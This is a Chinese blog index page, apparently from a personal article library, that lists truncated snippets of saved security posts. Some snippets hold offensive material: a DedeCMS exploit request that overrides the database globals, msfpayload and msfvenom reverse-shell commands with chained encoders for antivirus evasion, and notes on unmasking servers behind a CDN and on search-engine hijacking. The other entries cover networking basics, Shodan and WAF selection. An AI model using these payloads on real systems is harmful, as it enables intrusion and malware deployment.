共 79 篇文章 |
|
dopost=login&validate=8235&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_insert into dede_mytag(aid,normbody) values(1,''{... 阅12912 转172 评0 公众公开 15-03-16 22:26 |
如何查询使用了CDN的网站的真实IP.对使用了 CDN的网站,如何查询他的真实IP地址,3:ping 命令这样写 ping xxx.com 而不是 ping www.xxx.com .ping xxx.com一般都会是真实IP,因为了解到现有很多CDN厂商基本只要求把www.xxx.com cname到cdn主服务器上去。www.xxx.com 和 xxx.com是两条独立的解析记录 一般只会把 www.xxx.com做 CDN.指的是查找... 阅8804 转23 评0 公众公开 15-03-16 18:12 |
很多站长在建站的过程中,有时候会点击竞争对手的网站结果发现来源百度页面被修改了,或者有时候会通过搜索引擎发现快照跟自己的网站不符合,这有个名词就是搜索引擎劫持。也可以通过如下搜索引擎劫持代码实现。什么样的代码是搜索引擎劫持代码?通过匹配http_agent(HTTP_USER_AGENT是用来检查浏览页面的访问者在用什么操作系统(包括版本号)... 阅612 转2 评0 公众公开 15-03-11 08:30 |
metasploit渗透测试笔记(内网渗透篇)0x01 reverse the shell.msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe.msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe.msfpayl... 阅2008 转13 评0 公众公开 15-02-27 23:09 |
Shodan搜索引擎介绍0x00 概要。同时介绍了Shodan能用初级筛选语法以及Shodan和其他工具的联合运用。Shodan能做的:1.用户搜索制定的项目2.Shodan寻找端口并拦截数据3.Shodan为拦截的数据设置索引4.显示结果。Shodan和google的区别:3.现在可以添加Shodan的链接https://cetas.paterva.com/TDS/runner/showseed/Shodan.注意:需要你有Shodan的API... 阅1549 转4 评0 公众公开 15-02-10 21:06 |
利用msfvenom生成木马程序。命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o.多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencod... 阅11052 转55 评0 公众公开 15-02-08 09:35 |
TCP、UDP和HTTP.在传输层中有TCP协议与UDP协议。HTTP/1.0为每一次HTTP的请求/响应建立一条新的TCP链接,因此一个包含HTML内容和图片的页面将需要建立多次的短期的TCP链接。不过,目前,有人正在研究基于TCP+UDP混合的HTTP协议。(转)" alt="HTTP、TCP、UDP、Socket (转)" src="http://images.cnblogs.com/cnblogs_com/goo... 阅88 转0 评0 公众公开 15-02-07 22:54 |
web application firewall web应用防火墙WAF选型关键。web application firewall简称WAF,翻译过来是web应用防火墙,主要用于拦截针对WEB应用的攻击。素包子谈一下自己对WAF的想法,欢迎拍砖和补充完善。拿着WAF的报告,可以让老板看到外部威胁及防御效果,以推动SDL的前进。法规遵循:PCI对WAF有明确要求;互联网公司不用WAF的原因之一就是性... 阅84 转0 评0 公众公开 15-02-07 22:53 |
阅72 转1 评0 公众公开 15-02-07 22:14 |
阅156 转2 评0 公众公开 15-02-06 22:34 |